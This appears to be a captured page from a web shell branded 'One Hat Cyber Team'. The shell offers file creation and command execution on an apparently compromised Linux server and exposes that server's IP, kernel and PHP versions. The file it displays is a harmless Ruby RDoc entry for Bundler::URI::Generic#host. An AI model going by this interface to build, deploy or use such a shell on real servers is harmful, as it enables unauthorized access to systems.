⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.93
Server IP:
65.108.141.171
Server:
Linux server.heloix.com 5.4.0-214-generic #234-Ubuntu SMP Fri Mar 14 23:50:27 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
ri
/
2.7.0
/
system
/
Bundler
/
URI
/
Generic
/
View File Name :
host-i.ri
U:RDoc::Attr[iI" host:ETI"Bundler::URI::Generic#host;TI"R;T:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"4Returns the host component of the Bundler::URI.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"7Bundler::URI("http://foo/bar/baz").host #=> "foo" ;T:@format0o; ; [I"0It returns nil if no host component exists.;T@o;; [I"9Bundler::URI("mailto:foo@example.org").host #=> nil ;T; 0o; ; [I"4The component does not contain the port number.;T@o;; [I"<Bundler::URI("http://foo:8080/bar/baz").host #=> "foo" ;T; 0o; ; [ I"=Since IPv6 addresses are wrapped with brackets in URIs, ;TI"?this method returns IPv6 addresses wrapped with brackets. ;TI"TThis form is not appropriate to pass to socket methods such as TCPSocket.open. ;TI"DIf unwrapped host names are required, use the #hostname method.;T@o;; [I"?Bundler::URI("http://[::1]/bar/baz").host #=> "[::1]" ;TI"<Bundler::URI("http://[::1]/bar/baz").hostname #=> "::1";T; 0: @fileI".lib/bundler/vendor/uri/lib/uri/generic.rb;T:0@omit_headings_from_table_of_contents_below0F@)I"Bundler::URI::Generic;TcRDoc::NormalClass0